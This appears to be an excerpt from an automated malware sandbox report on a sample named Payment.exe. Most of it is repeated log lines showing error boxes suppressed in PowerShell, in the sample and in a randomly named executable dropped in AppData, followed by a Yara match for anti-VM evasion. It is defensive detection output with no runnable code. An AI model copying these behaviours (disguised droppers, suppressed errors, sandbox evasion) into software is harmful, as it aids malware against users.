Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Payment.exe PID: 3532, type: MEMORYSTR
